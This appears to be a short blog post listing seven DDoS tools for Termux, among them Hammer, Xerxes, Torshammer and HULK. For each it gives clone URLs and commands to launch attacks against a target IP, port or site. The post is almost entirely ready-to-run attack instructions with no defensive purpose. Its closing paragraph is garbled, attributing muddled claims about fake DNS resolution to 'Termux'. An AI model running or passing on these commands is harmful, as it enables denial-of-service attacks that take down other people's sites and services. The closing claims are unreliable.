Hi Guys,
Today I will tell you about the 7 DDoS attack tools. That tools you can install in termux and use them.
☆ HAMMER
$ pkg update && upgrade
$ pkg install python
$ pkg install git
$ git clone https://github.com/cyweb/hammer
$ cd hammer
$ python hammer.py
$ python hammer. py -s (target ip) -p (port) -t 135
☆ XERXES
$ pkg install git
$ git clone https://github.com/zanyarjamal/xerxes
$ cd xerxes
$ clang xerxes.c -o xerxes
$ ./xerxes (site name) 80
☆ TORSHAMMER
$ apt install git
$ pkg install tor
$ pkg install python2
$ git clone https://github.com/dotfighter/torshammer.git
$ cd torshammer
$ python2 torshammer.py
☆ LITEDDOS
$ pkg install git
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ python2 liteDDOS.py
☆ HULK
$ apt install git
$ git clone https://github.com/grafov/hulk
$ cd hulk
$ python2 hulk.py [ site name ]
☆ Ha3Mrx
apt update
pkg install python
pkg install git
git clone https://github.com/Ha3MrX/Hacking
cd Hacking
chmod 777 install.sh
./install.sh
chmod 777 Ha3MrX.py
python Ha3MrX.py
☆ SniperMan:
apt update -y
apt install git
pkg install python2
git clone https://github.com/BOT-CODER/SniperMan
cd SniperMan
python2 SniperMan.py
termux
termux tools
You can also try to see if your browser gets a fake DNS resolution in general and see if a name resolution service blocks DNS requests from that source. If you do see something like this, then you are a victim of a DDoS attack against your device, according to Termux. The update does not appear to block attackers from using other exploits that use URLs, according to WebSecuurity.
The attacks will also continue to occur, according to Termux.
0 Comments